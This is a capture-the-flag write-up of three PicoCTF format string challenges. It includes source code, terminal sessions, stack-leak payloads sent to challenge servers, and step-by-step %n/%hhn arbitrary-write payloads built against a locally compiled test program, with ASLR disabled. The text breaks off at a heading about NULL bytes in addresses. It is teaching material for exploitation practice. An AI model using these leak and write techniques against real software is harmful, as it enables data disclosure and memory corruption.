[PicoCTF] Format String Attack - 0x101

Just another %n
Format-Type Specifier / Stackpops vs. Direct Access Parameters (NULL) / Stack Misalignments / PLT & GOT Alteration / Pwntools fmtstr() Write-up.
In the context of this article, the ASLR mechanism will be disabled for local debugging purposes:
jamarir@kali:~$ sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'
Format String 0
Can you use your knowledge of format strings to make the customers happy?
Program Execution
For most challenges, we first need to create a flag.txt file for local debugging:
jamarir@kali:~$ ./format-string-0
Please create 'flag.txt' in this directory with your own debugging flag.
Once the file is created with a dummy string, the program runs as follows:
jamarir@kali:~$ echo fl4g > flag.txt
jamarir@kali:~$ ./format-string-0
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
Here comes the first customer Patrick who wants a giant bite.
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
Enter your recommendation:
We must recommend one of the following burgers to Patrick: Breakf@st_Burger, Gr%114d_Cheese, or Bac0n_D3luxe. Recommending Breakf@st_Burger or Bac0n_D3luxe does nothing in particular, for instance:
jamarir@kali:~$ ./format-string-0
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
Here comes the first customer Patrick who wants a giant bite.
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
Enter your recommendation: Bac0n_D3luxe
Bac0n_D3luxePatrick is still hungry!
Try to serve him something of larger size!
But recommending Gr%114d_Cheese surprisingly outputs Gr[107 spaces]4202954_Cheese:
jamarir@kali:~$ ./format-string-0
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
Here comes the first customer Patrick who wants a giant bite.
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
Enter your recommendation: Gr%114d_Cheese
Gr 4202954_Cheese
Good job! Patrick is happy! Now can you serve the second customer?
Sponge Bob wants something outrageous that would break the shop (better be served quick before the shop owner kicks you out!)
Please choose from the following burgers: Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak
Enter your recommendation:
Finally, we’re left with another choice between Pe%to_Portobello, $outhwest_Burger, and Cla%sic_Che%s%steak. Choosing Pe%to_Portobello displays Pe20021600_Portobello:
Enter your recommendation: Pe%to_Portobello
Pe20021600_Portobello
While Cla%sic_Che%s%steak discloses the flag:
Enter your recommendation: Cla%sic_Che%s%steak
fl4g
Source Code
Let’s look at the source code to understand what happened. First, the program loads the content of flag.txt into the flag variable:
[...]
#define FLAGSIZE 64
char flag[FLAGSIZE];
[...]
int main(int argc, char **argv){
FILE *f = fopen("flag.txt", "r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(flag, FLAGSIZE, f);
[...]
Then, it registers the sigsegv_handler() function, which discloses the flag and is called if the program receives a SIGSEGV (segmentation fault):
[...]
void sigsegv_handler(int sig) {
printf("\n%s\n", flag);
fflush(stdout);
exit(1);
}
[...]
int main(int argc, char **argv){
[...]
signal(SIGSEGV, sigsegv_handler);
gid_t gid = getegid();
setresgid(gid, gid, gid);
serve_patrick();
[...]
}
[...]
Finally, it calls the serve_patrick() function:
[...]
#define BUFSIZE 32
[...]
int on_menu(char *burger, char *menu[], int count) {
for (int i = 0; i < count; i++) {
if (strcmp(burger, menu[i]) == 0)
return 1;
}
return 0;
}
[...]
void serve_patrick() {
printf("%s %s\n%s\n%s %s\n%s",
"Welcome to our newly-opened burger place Pico 'n Patty!",
"Can you help the picky customers find their favorite burger?",
"Here comes the first customer Patrick who wants a giant bite.",
"Please choose from the following burgers:",
"Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe",
"Enter your recommendation: ");
fflush(stdout);
char choice1[BUFSIZE];
scanf("%s", choice1);
char *menu1[3] = {"Breakf@st_Burger", "Gr%114d_Cheese", "Bac0n_D3luxe"};
if (!on_menu(choice1, menu1, 3)) {
printf("%s", "There is no such burger yet!\n");
fflush(stdout);
} else {
int count = printf(choice1);
if (count > 2 * BUFSIZE) {
serve_bob();
} else {
printf("%s\n%s\n",
"Patrick is still hungry!",
"Try to serve him something of larger size!");
fflush(stdout);
}
}
}
This function prints the first menu. Then, the user’s input is read and stored into choice1. If the user’s burger is on the menu, it is passed directly to printf() as the format string. If the number of printed characters is more than twice BUFSIZE (i.e. 64), serve_bob() is called, which follows the same logic:
[...]
#define BUFSIZE 32
[...]
void serve_patrick() {
int count = printf(choice1);
if (count > 2 * BUFSIZE) {
serve_bob();
[...]
void serve_bob() {
printf("\n%s %s\n%s %s\n%s %s\n%s",
"Good job! Patrick is happy!",
"Now can you serve the second customer?",
"Sponge Bob wants something outrageous that would break the shop",
"(better be served quick before the shop owner kicks you out!)",
"Please choose from the following burgers:",
"Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak",
"Enter your recommendation: ");
fflush(stdout);
char choice2[BUFSIZE];
scanf("%s", choice2);
char *menu2[3] = {"Pe%to_Portobello", "$outhwest_Burger", "Cla%sic_Che%s%steak"};
if (!on_menu(choice2, menu2, 3)) {
printf("%s", "There is no such burger yet!\n");
fflush(stdout);
} else {
printf(choice2);
fflush(stdout);
}
}
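The size check in serve_patrick() can be reproduced outside the binary. The sketch below is only an illustration: it assumes that Python's % operator pads %114d the same way printf() does for this simple case, and it reuses the value 4202954 seen in the run above (the real value is whatever printf() happens to read as its first argument). The helper name printed_length is hypothetical.

```python
BUFSIZE = 32  # same constant as in the challenge source


def printed_length(burger, leaked_value):
    """Length of the output when `burger` is used as a format string
    with a single integer argument (assumption: one specifier only)."""
    return len(burger % leaked_value)


count = printed_length("Gr%114d_Cheese", 4202954)
# 2 ("Gr") + 114 (padded integer) + 7 ("_Cheese") characters
print(count, count > 2 * BUFSIZE)  # 123 True
```

Since 123 is greater than 64, this burger is the only one of the first menu that reaches serve_bob().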
Format String Attack & Availability Issues
printf() Prototype
The vulnerable lines are:
int count = printf(choice1);
printf(choice2);
Indeed, using arbitrary user input as the format string of the printf family of functions may lead to malicious code execution. Let’s consider the following code:
#include <stdio.h>
void main(int argc, char **argv) {
printf("%s\n", argv[1]);
printf(argv[1]);
}
Even if both printf calls output the same text when we provide a standard input:
jamarir@kali:~$ ./a.out "test"
test
test
The first printf call is safe, while the second isn’t. That’s because, in the second call, we gave the user control over the format string (first argument), and thus over which format-type specifiers are processed by the function. As the Microsoft documentation states, this is bad :(
The possible format-type specifiers are numerous and well documented. For instance, %d displays a decimal integer, %.9x displays a hexadecimal with a precision of 9 digits, and %s displays a string passed by reference:
#include <stdio.h>
void main() {
char buf[16] = "Hey";
printf("1e37"); // Prints "1e37"
printf("%s", buf); // Prints "Hey"
printf("%d %.4x %.3p", 5, 10, 11); // Prints "5 000a 0x00b"
}
As we can see, the printf function (and its derivatives) takes at least 1 argument, the format string (which may contain any format specifier), followed by an arbitrary number of arguments. The first call has only 1 argument, the format string. The second has 2 arguments: the format string and a string pointer. The third has 4 arguments: the format string and one integer for each format specifier.
printf() Machine
To keep track of which format specifier refers to which argument, the printf() machine uses an argument pointer, along with an output counter. Consider how the printf() machine handles the following execution, just before processing the last format-type specifier %d:
printf("a=%x,b=%d", 0x112233, 0x33);
First, the arguments are pushed onto the stack in reverse order, and the argument pointer initially points to the top of the stack (esp). When a format-type specifier (e.g. %x) is encountered, the argument pointer “stack-pops” the argument (e.g. 0x112233) and prints it accordingly.
The issue, though, is that if there are more specifiers than arguments, the argument pointer will be “stack-popping” arbitrary values that weren’t pushed in the first place. For instance, if we execute this code:
printf("a=%x,b=%d,c=%x", 0x112233, 0x33);
We obtain the following result:
jamarir@kali:~$ gcc fmt.c; ./a.out
a=112233,b=51,c=56403dd8
a and b point to legitimately known values pushed onto the stack, while c has no corresponding value (there is no 4th argument). But because there is a format specifier, the argument pointer does its job and moves further into the stack. As a result, we know that right after 0x33, the stack contains the value 0x56403dd8.
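The behaviour described above can be modelled with a toy interpreter. This is a deliberately simplified sketch, not how libc implements printf(): the toy_printf name is hypothetical, only %x and %d are handled, and the "stack" is a plain Python list whose third entry stands for the unrelated value that happened to follow the two pushed arguments.

```python
def toy_printf(fmt, stack):
    """Tiny model of the printf() machine: only %x and %d are handled."""
    output = []
    arg_ptr = 0  # index of the next stack slot to "pop"
    pos = 0
    while pos < len(fmt):
        if fmt[pos] == "%" and pos + 1 < len(fmt) and fmt[pos + 1] in "xd":
            value = stack[arg_ptr]  # read whatever the pointer designates
            arg_ptr += 1            # then move further into the stack
            output.append(format(value, fmt[pos + 1]))
            pos += 2
        else:
            output.append(fmt[pos])
            pos += 1
    return "".join(output)


# Two pushed arguments, followed by a value that was already on the stack.
stack = [0x112233, 0x33, 0x56403DD8]
print(toy_printf("a=%x,b=%d,c=%x", stack))  # a=112233,b=51,c=56403dd8
```

The machine never checks how many arguments were really passed: the third specifier simply reads the next slot.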
Lost in the Strings
Back to our flag disclosure: choosing the Cla%sic_Che%s%steak burger disclosed the flag.
Since our input is interpreted as a format string, each %s requires a string pointer as its argument. But if the argument pointer designates a value that isn’t a readable address (i.e. we can’t read the memory region the supposed string lives in), the program triggers a segmentation fault, and discloses the flag through the sigsegv_handler() call:
Enter your recommendation: Cla%sic_Che%s%steak
fl4g
Therefore, 3 arbitrary stackpops were sufficient to reference a forbidden memory region.
The server-side flag is:
jamarir@kali:~$ nc mimas.picoctf.net 51219
Welcome to our newly-opened burger place Pico 'n Patty! Can you help the picky customers find their favorite burger?
Here comes the first customer Patrick who wants a giant bite.
Please choose from the following burgers: Breakf@st_Burger, Gr%114d_Cheese, Bac0n_D3luxe
Enter your recommendation: Gr%114d_Cheese
Gr 4202954_Cheese
Good job! Patrick is happy! Now can you serve the second customer?
Sponge Bob wants something outrageous that would break the shop (better be served quick before the shop owner kicks you out!)
Please choose from the following burgers: Pe%to_Portobello, $outhwest_Burger, Cla%sic_Che%s%steak
Enter your recommendation: Cla%sic_Che%s%steak
ClaCla%sic_Che%s%steakic_Che(null)
picoCTF{7h[...]e6}
Format String 1
Patrick and Sponge Bob were really happy with those orders you made for them, but now they're curious about the secret menu. Find it, and along the way, maybe you'll find something else of interest!
Program Execution
This program requires the creation of 2 secret menu items and a flag file for local debugging:
jamarir@kali:~$ echo AAAAAAAA > secret-menu-item-1.txt
jamarir@kali:~$ echo BBBBBBBB > secret-menu-item-2.txt
jamarir@kali:~$ echo CCCCCCCC > flag.txt
When executed, the program displays back any text we provide, e.g. Test123:
jamarir@kali:~$ ./format-string-1
Give me your order and I'll read it back to you:
Test123
Here's your order: Test123
Bye!
But as we might guess, format string specifiers in our input are interpreted in the output:
jamarir@kali:~$ ./format-string-1
Give me your order and I'll read it back to you:
%x.%x.%x.
Here's your order: ffffd4b0.0.0.
Bye!
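Thus, we know that each of our specifiers (%x.%x.%x. here) will process values that were never passed as arguments: on x86-64, the first five come from registers, and the following ones from the stack.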
Source Code ?
First, the content of the first secret menu item is stored in secret1:
int main() {
char buf[1024];
char secret1[64];
char flag[64];
char secret2[64];
// Read in first secret menu item
FILE *fd = fopen("secret-menu-item-1.txt", "r");
if (fd == NULL){
printf("'secret-menu-item-1.txt' file not found, aborting.\n");
return 1;
}
fgets(secret1, 64, fd);
The same goes for secret2:
// Read in second secret menu item
fd = fopen("secret-menu-item-2.txt", "r");
if (fd == NULL){
printf("'secret-menu-item-2.txt' file not found, aborting.\n");
return 1;
}
fgets(secret2, 64, fd);
The flag is stored in flag:
// Read in the flag
fd = fopen("flag.txt", "r");
if (fd == NULL){
printf("'flag.txt' file not found, aborting.\n");
return 1;
}
fgets(flag, 64, fd);
Finally, up to 1024 characters of our input are read into buf:
printf("Give me your order and I'll read it back to you:\n");
fflush(stdout);
scanf("%1024s", buf);
printf("Here's your order: ");
printf(buf);
printf("\n");
fflush(stdout);
printf("Bye!\n");
fflush(stdout);
return 0;
The vulnerable code is printf(buf).
Format String Attack & Confidentiality Issues
The program is a 64-bit executable:
jamarir@kali:~$ file format-string-1
format-string-1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=62bc37ea6fa41f79dc756cc63ece93d8c5499e89, for GNU/Linux 3.2.0, not stripped
So we may use the l format-size prefix, along with the x format-type specifier, to disclose any 8-byte slot. For example, we may disclose 30 slots as follows:
jamarir@kali:~$ ./format-string-1 <<<$(python2 -c "print'%lx-'*30")
Give me your order and I'll read it back to you:
Here's your order: 7fffffffd490-0-0-a-400-4242424242424242-7fffffff000a-7ffff7fc06c0-3-7fff00000000-7ffff7dc4938-7fffffffd6c0-7ffff7ffe680-4343434343434343-7fffffff000a-ffffd714-0-0-7fffffffd830-7ffff7ffe680-7ffff7ff285d-4141414141414141-7fffffff000a-3de00ec7-7ffff7fd15dc-1-7fffffffd830-0-0-2d786c252d786c25-
Bye!
Interestingly, we see that:
The 6th stackpop slot contains our secret menu item 2 (B...B, displayed as 0x42...42).
The 14th stackpop slot contains our flag (C...C, displayed as 0x43...43).
The 22nd stackpop slot contains our secret menu item 1 (A...A, displayed as 0x41...41).
We want the flag, which should also be in the 14th slot server-side. We can disclose it in hexadecimal form:
jamarir@kali:~$ nc mimas.picoctf.net 51028 <<<$(python2 -c "print'%lx-'*14")
Give me your order and I'll read it back to you:
Here's your order: 402118-0-7d9c8b66fa00-0-1891880-a347834-7ffcfd6dc0e0-7d9c8b460e60-7d9c8b6854d0-1-7ffcfd6dc1b0-0-0-7b4654436f636970-
Bye!
Putting the hexadecimal value of the last slot into CyberChef (taking endianness into account) discloses the string picoCTF{. Looking at the next slots:
jamarir@kali:~$ nc mimas.picoctf.net 51028 <<<$(python2 -c "print'%lx-'*20")
Give me your order and I'll read it back to you:
Here's your order: 402118-0-70a4a6267a00-0-1ee9880-a347834-7fff414c5d70-70a4a6058e60-70a4a627d4d0-1-7fff414c5e40-0-0-7b4654436f636970-355f31346d316e34-3478345f33317937-31395f673431665f-7d653464663533-7-70a4a627f8d8-
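We see that the penultimate slot is 7 alone, which is no longer printable text, and that the slot before it (7d653464663533) is only 7 bytes long, i.e. its highest byte is a NULL byte terminating the string. So our flag spans 5 slots, from the 14th to the 18th: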
7b4654436f636970-355f31346d316e34-3478345f33317937-31395f673431665f-7d653464663533
Decoding each slot individually gives the flag picoCTF{4n[...]4e}.
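The CyberChef step can also be done in a few lines of Python. This is a minimal sketch, assuming each %lx value is an 8-byte little-endian slot; the decode_slot helper is a hypothetical name, and only the first server-side slot and the local dummy flag are decoded here.

```python
def decode_slot(hex_slot):
    """Turn one %lx slot into the bytes as they sit in memory (little-endian)."""
    value = int(hex_slot, 16)
    raw = value.to_bytes(8, "little")  # 8-byte slot, lowest byte first
    return raw.rstrip(b"\x00")         # drop the NULL padding / terminator


print(decode_slot("7b4654436f636970"))  # b'picoCTF{' (first server-side slot)
print(decode_slot("4343434343434343"))  # b'CCCCCCCC' (local dummy flag)
```

Applying the same function to each following slot and concatenating the results rebuilds the whole string.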
Direct Access Parameter ? %N$ ?
An interesting feature we’ll exploit afterwards is the %N$ prefix specifier (aka. the Direct Access Parameter). This specifier retrieves a slot’s content directly, without having to use dummy format string specifiers to perform multiple stackpops.
In our vulnerable program for example, knowing that the flag is the 14th stack slot of the argument pointer, we can access it directly using %14$lx:
jamarir@kali:~$ ./format-string-1 <<<$(python2 -c 'print"%14$lx"')
Give me your order and I'll read it back to you:
Here's your order: 4343434343434343
Bye!
As a side note, however, if we want the 15th slot from there, we must either perform multiple stackpops, or use the %15$lx specifier. Indeed, a %lx added afterwards still reads the first slot of the argument pointer:
jamarir@kali:~$ ./format-string-1 <<<$(python2 -c 'print"%14$lx-"+"%lx-"+"%1$lx"')
Give me your order and I'll read it back to you:
Here's your order: 4847464544434241-7fffffffd4b0-7fffffffd4b0
Bye!
Format String 2
This program is not impressed by cheap parlor tricks like reading arbitrary data off the stack. To impress this program you must change data on the stack!
Program Execution
Executing the program outputs our input as usual:
jamarir@kali:~$ echo flagusator > flag.txt
jamarir@kali:~$ ./vuln
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
HEY!
Here's your input: HEY!
sus = 0x21737573
You can do better!
Source Code
First, the program initializes a variable named sus:
int sus = 0x21737573;
Then, it fills buf with our input:
int main() {
char buf[1024];
char flag[64];
printf("You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?\n");
fflush(stdout);
scanf("%1024s", buf);
printf("Here's your input: ");
printf(buf);
printf("\n");
fflush(stdout);
Again, the vulnerable code is printf(buf).
Format String Attack & Integrity Issues
Write What / Where ?
Since sus is a global variable initialized with a non-zero value, it is stored in the data segment, i.e. the .data section. The executable’s sections can be shown with objdump:
jamarir@kali:~$ objdump -s vuln
[...]
Contents of section .data:
404050 00000000 00000000 00000000 00000000 ................
404060 73757321 sus!
[...]
As we can see, sus is located at address 0x404060. Also, that section is writable, as it doesn’t have the READONLY flag, unlike the .text section:
jamarir@kali:~$ objdump -h vuln
[...]
14 .text 00000206 0000000000401110 0000000000401110 00001110 2**4
CONTENTS, ALLOC, LOAD, READONLY, CODE
[...]
24 .data 00000014 0000000000404050 0000000000404050 00003050 2**3
CONTENTS, ALLOC, LOAD, DATA
[...]
Our goal is to set sus to 0x67616c66 to disclose the flag:
[...]
if (sus == 0x67616c66) {
printf("I have NO clue how you did that, you must be a wizard. Here you go...\n");
// Read in the flag
FILE *fd = fopen("flag.txt", "r");
fgets(flag, 64, fd);
printf("%s", flag);
fflush(stdout);
}
[...]
So we want to write 0x67616c66 into 0x404060.
Notice that when sus is compared with 0x67616c66, the disassembly shows that sus is read from rip + 0x2de7:
jamarir@kali:~$ objdump -M intel -d vuln
[...]
40126e: e8 6d fe ff ff call 4010e0 <fflush@plt>
401273: 8b 05 e7 2d 00 00 mov eax,DWORD PTR [rip+0x2de7] # 404060 <sus>
401279: 3d 66 6c 61 67 cmp eax,0x67616c66
[...]
In particular, when the instruction at 401273 executes, the rip value used for addressing is actually 401279, i.e. the address of the next instruction. Indeed, when a breakpoint is hit at *main+125 = 401273:
=> 0x0000000000401273 <+125>: mov eax,DWORD PTR [rip+0x2de7] # 0x404060 <sus>
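gdb still reports rip as 401273, so sus is at offset 0x2de7 + 6 from it, where 6 is the length of the mov instruction. In other words, sus is at offset 0x2de7 from the next instruction (401279):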
(gdb) x $rip + 0x2de7 + 6
0x404060 <sus>: 0x21737573
(gdb) x 0x401279 + 0x2de7
0x404060 <sus>: 0x21737573
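The RIP-relative computation above boils down to two additions. The sketch below only replays the arithmetic with the values read from the disassembly; the constant names are hypothetical.

```python
INSN_ADDR = 0x401273    # address of the mov instruction
INSN_LEN = 6            # it is encoded on 6 bytes: 8b 05 e7 2d 00 00
DISPLACEMENT = 0x2DE7   # offset encoded in the instruction

next_rip = INSN_ADDR + INSN_LEN       # rip as seen by the addressing logic
sus_addr = next_rip + DISPLACEMENT    # effective address of sus
print(hex(next_rip), hex(sus_addr))   # 0x401279 0x404060
```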
Write How ? %n ? %hn ? %hhn ?
So we want to write 0x67616c66 into 0x404060. One crucial format-type specifier is %n. This specifier writes the number of characters printed so far into the variable whose address is given as argument. For instance, the second printf() writes 4 into i:
#include <stdio.h>
void main(int argc, char **argv) {
int i = 1;
printf("%d", i); // Prints "1"
printf("AAAA%nBBBB", &i); // Prints "AAAABBBB"
printf("%d", i); // Prints "4"
}
That’s because when %n is processed by the printf() machine, the output’s size is 4: AAAA. Even if we print BBBB afterwards, the output’s size at that point is 4.
Another thing to bear in mind is that %n outputs nothing. Therefore, it doesn't increase the printf() machine’s counter. In other words, the following code will write 4 (AAAA), then 7 (AAAABBB), into i:
#include <stdio.h>
void main() {
int i = 1;
printf("%d", i); // Prints "1"
printf("AAAA%nBBB%nB", &i, &i); // Prints "AAAABBBB"
printf("%d", i); // Prints "7"
}
Why does such a %n specifier exist in the first place? ¯\_(ツ)_/¯
It is even disabled by default in Visual Studio.
The number of bytes written depends on the size prefix used with the %n format-type:
%n writes 4 bytes in memory.
%hn writes 2 bytes in memory.
%hhn writes 1 byte in memory.
To better understand, let’s consider the following code:
#include <stdio.h>
void main() {
int i = 0x99999999;
printf("%.4919x%hhn", 0, &i); // i = 0x99999937
printf("%.4919x%hn", 0, &i); // i = 0x99991337
printf("%.4919x%n", 0, &i); // i = 0x00001337
}
First, we initialize i to 0x99999999. Then, we perform 3 writes of different sizes: 1, 2 and 4 bytes respectively. Because we’re outputting the integer 0 with a precision of 0x1337 = 4919 digits, we’re successively overwriting i with:
0x99999937, where 1 byte is written with %hhn.
0x99991337, where 2 bytes are written with %hn.
0x00001337, where 4 bytes are written with %n. Again, because %n writes 4 bytes, writing 0x1337 implicitly means writing 0x00001337.
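The three write sizes can be emulated with simple bit masks. This is only a model of the effect on a 32-bit variable, assuming a little-endian machine where the write starts at the lowest byte; write_n is a hypothetical helper, not a libc function.

```python
def write_n(old, count, size):
    """Emulate a %n-style write of `count` over `size` bytes of a 32-bit `old`."""
    mask = (1 << (8 * size)) - 1  # 0xff, 0xffff or 0xffffffff
    return (old & ~mask & 0xFFFFFFFF) | (count & mask)


i = 0x99999999
i = write_n(i, 4919, 1)  # %hhn: only the lowest byte changes
print(hex(i))            # 0x99999937
i = write_n(i, 4919, 2)  # %hn: the 2 lowest bytes change
print(hex(i))            # 0x99991337
i = write_n(i, 4919, 4)  # %n: all 4 bytes change
print(hex(i))            # 0x1337
```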
One final thing to bear in mind is that we can’t (or at least, don’t want to) write a tremendously big number of characters in the output. For instance, let’s say we want to write 0x67616c66 into 0x404060 with a single %n. We’d have to output nearly 1.7B characters (0x67616c66 = 1,734,437,990), which often leads to crashes.
Even if modern systems are likely to be able to print that many characters, it’s not an efficient approach.
The following code effectively overwrites i with 0x67616c66, but requires almost 2 minutes to run:
#include <stdio.h>
void main() {
int i = 0;
printf("%.1734437990x%n", 0, &i); // Outputs 1.7B chars
printf("%#x", i); // Prints "0x67616c66"
}
jamarir@kali:~$ time ./a.out
000[...]000x67616c66
./a.out 3.71s user 13.79s system 17% cpu 1:42.37 total
A better approach is to overwrite each byte at our address with the appropriate value. Taking into account that the output’s size can only increase, if we want to write 0x67616c66 into 0x404060, we’ll have to print:
jamarir@kali:~$ python -c 'print(f"+{0x66} -> +{0x6c - 0x66} -> +{0x161 - 0x6c} -> +{0x167 - 0x161}")'
+102 -> +6 -> +245 -> +6
0x66 = 102 characters in the output, then use %hhn against 0x404060. The output’s size being 0 so far, we’ll add 102 characters.
0x6c = 108 characters in the output, then use %hhn against 0x404061. The output’s size being 102 so far, we’ll add 6 characters.
0x161 = 353 characters in the output, then use %hhn against 0x404062. The output’s size being 108 so far, we’ll add 245 characters.
0x167 = 359 characters in the output, then use %hhn against 0x404063. The output’s size being 353 so far, we’ll add 6 characters.
Notice how 0x161 (resp. 0x167) is used to write 0x61 (resp. 0x67) into the byte at 0x404062 (resp. 0x404063). That’s because we already printed 108 (resp. 353) characters so far, and the output size can only increase. Because we can’t decrease that counter to 0x61 = 97 (resp. 0x67 = 103), we add an extra 0x100 (the leading 1), which %hhn ignores anyway since it only keeps the lowest byte of the counter.
For instance, the following code is an upgraded version of our above code:
#include <stdio.h>
void main() {
int i = 0;
printf("%102c%1$hhn%6c%2$hhn%245c%3$hhn%6c%4$hhn", &i, (char*)&i+1, (char*)&i+2, (char*)&i+3);
printf("%#x", i); // Prints "0x67616c66"
}
Notice that we changed the format-type specifier from %.Nx to %Nc. That’s because %.Nx only sets a minimum number of digits. For example, see the following printf calls:
#include <stdio.h>
void main() {
int i = 0x41000041;
printf("%.2x %.8x", i, i); // Prints "41000041 41000041" (17 chars), which is more than what we want (2+1+8 chars).
printf("%2c %8c", i, i); // Prints " A        A" (11 chars), which is exactly what we want (2+1+8 chars).
}
The first call outputs 17 characters, even though we wanted exactly 11 characters ("%.2x %.8x"). The second call outputs 11 characters, which is exactly what we wanted ("%2c %8c"). Thus, %Nc gives us exact control over the output’s size.
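The per-byte paddings computed by hand earlier in this section can be derived programmatically. The following is a minimal sketch, assuming one %Nc followed by one %hhn per byte, lowest byte first; hhn_paddings is a hypothetical helper name. Since %Nc always prints at least one character, a padding of 0 is turned into 256 (a full wrap of the low byte).

```python
def hhn_paddings(value, already_printed=0, nbytes=4):
    """Number of characters to add before each %hhn, lowest byte first."""
    paddings = []
    printed = already_printed
    for k in range(nbytes):
        wanted = (value >> (8 * k)) & 0xFF
        # The counter can only grow, so wrap around modulo 256 if needed.
        pad = (wanted - printed) % 256 or 256
        paddings.append(pad)
        printed += pad
    return paddings


print(hhn_paddings(0x67616C66))  # [102, 6, 245, 6]
```

The already_printed parameter accounts for anything output before the first %Nc (prefix text, addresses, stackpops).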
Stackpops & NULL addr ??
Standard Stackpops Overwriting
When exploiting a format string vulnerability, a standard method to write arbitrary data into an address is to use the stackpop method, which goes as follows:
Find out how many stackpops are needed to reach the beginning of our input.
Put the addresses to write at the beginning of our input, separated by dummy junk strings. These junk strings are there to be consumed by the following %Nc format-type specifiers.
Build the magical %Nc incremental calculations and their respective %hhn, while taking into account the size of the output already printed (text, stackpops, junk strings).
So our input is laid out as follows: the target addresses interleaved with junk strings, then the stackpops, then one %Nc%hhn pair per byte to write.
For example, let’s compile the following vulnerable 32-bit program:
#include <stdio.h>
#include <string.h>
void main() {
int i = 0;
char buf[100];
scanf("%s", buf);
printf(buf);
printf("\ni=%p is at %p", i, &i);
}
jamarir@kali:~$ gcc -m32 fmt.c; ./a.out test
test
i=(nil) is at 0xffffcdcc
ASLR is disabled, so we know i will stay at location 0xffffcdcc. Its content is 0 (printed as (nil) by printf). Let’s say we want to write 0x40504030 into i. The methodology is:
Find out how many stackpops are required. In my case, 6 stackpops are required to reach the input’s start (AAAA = 0x41414141):
jamarir@kali:~$ ./a.out <<<$(python2 -c 'print"AAAA"+"%lx-"*6')
AAAABBBBffffcd68-5655521c-565561b4-f7ffdb8c-1-41414141-
i=(nil) is at 0xffffcdcc
Put the addresses to be overwritten at the beginning of our string, i.e. 0xffffcdcc, 0xffffcdcd, 0xffffcdce and 0xffffcdcf in little-endian, separated by junk strings (e.g. AAAA):
jamarir@kali:~$ ./a.out <<<$(python2 -c 'print"\xcc\xcd\xff\xff"+"AAAA\xcd\xcd\xff\xff"+"AAAA\xce\xcd\xff\xff"+"AAAA\xcf\xcd\xff\xff"')
AAAAAAAAAAAA
i=(nil) is at 0xffffcdcc
Build the magical %Nc incremental calculations and their respective %hhn. But we first need to know how many bytes will be in the output after 5 stackpops. For that, we’ll use %1c as stackpops (which totals 5 bytes), added to our 4 addresses (which total 16 bytes) and the junk strings "AAAA" * 3 (which total 12 bytes). In total, 5 + 16 + 12 = 33 = 0x21 characters have been printed when the first byte of i is written with %hhn:
jamarir@kali:~$ ./a.out <<<$(python2 -c 'print"\xcc\xcd\xff\xff"+"AAAA\xcd\xcd\xff\xff"+"AAAA\xce\xcd\xff\xff"+"AAAA\xcf\xcd\xff\xff"+"%1c"*5+"%hhn"')
AAAAAAAAAAAAh
i=0x21 is at 0xffffcdcc
Note that we can’t print zero characters with such a format specifier. Indeed, %0c still increments the output counter by 1 character, which results in the same i = 0x21 as above:
jamarir@kali:~$ ./a.out <<<$(python2 -c 'print"\xcc\xcd\xff\xff"+"AAAA\xcd\xcd\xff\xff"+"AAAA\xce\xcd\xff\xff"+"AAAA\xcf\xcd\xff\xff"+"%0c"*5+"%hhn"')
AAAAAAAAAAAAh
i=0x21 is at 0xffffcdcc
Also, if the exploited program printed some text before our input (e.g. "Your name: %s"), these first 11 characters would have to be taken into account.
If we remove the last %1c (which will be replaced by the first %Nc calculation below), the output’s size becomes 0x20 = 32. Then, to write 0x40504030 into 0xffffcdcc, we’ll print:
jamarir@kali:~$ python -c 'print(f"+{0x30} -> +{0x40 - 0x30} -> +{0x50 - 0x40} -> +{0x140 - 0x50}")'
+48 -> +16 -> +16 -> +240
0x30 = 48 characters in the output, and use %hhn against 0xffffcdcc. The output’s size being 32 so far, we’ll add 16 characters.
0x40 = 64 characters in the output, and use %hhn against 0xffffcdcd. The output’s size being 48 so far, we’ll add 16 characters.
0x50 = 80 characters in the output, and use %hhn against 0xffffcdce. The output’s size being 64 so far, we’ll add 16 characters.
0x140 = 320 characters in the output, and use %hhn against 0xffffcdcf. The output’s size being 80 so far, we’ll add 240 characters.
jamarir@kali:~$ ./a.out <<<$(python2 -c 'print"\xcc\xcd\xff\xff"+"AAAA\xcd\xcd\xff\xff"+"AAAA\xce\xcd\xff\xff"+"AAAA\xcf\xcd\xff\xff"+"%1c"*4+"%16c%hhn"+"%16c%hhn"+"%16c%hhn"+"%240c%hhn"')
AAAAAAAAAAAAh A A A
i=0x40504030 is at 0xffffcdcc
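The whole stackpop payload above can be rebuilt by a short script. This is a Python 3 sketch under the assumptions of this example (32-bit target, 5 stackpops before the input, 4-byte junk strings); stackpop_payload is a hypothetical helper, and the addresses only hold for this local, ASLR-less run.

```python
import struct


def stackpop_payload(target, value, pops, junk=b"AAAA"):
    """Addresses + junk, then stackpops, then one %Nc%hhn pair per byte."""
    chunks = []
    for k in range(4):
        if k:
            chunks.append(junk)  # consumed by the %Nc preceding each later %hhn
        chunks.append(struct.pack("<I", target + k))  # little-endian address
    head = b"".join(chunks)

    # The last stackpop is performed by the first %Nc, hence pops - 1 here.
    stackpops = b"%1c" * (pops - 1)
    printed = len(head) + (pops - 1)

    tail = b""
    for k in range(4):
        wanted = (value >> (8 * k)) & 0xFF
        pad = (wanted - printed) % 256 or 256  # %Nc prints at least 1 char
        tail += b"%%%dc%%hhn" % pad
        printed += pad
    return head + stackpops + tail


payload = stackpop_payload(0xFFFFCDCC, 0x40504030, pops=5)
print(payload)
```

The result is byte-for-byte the string passed to ./a.out in the last command above.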
What about NULL bytes in the address ?
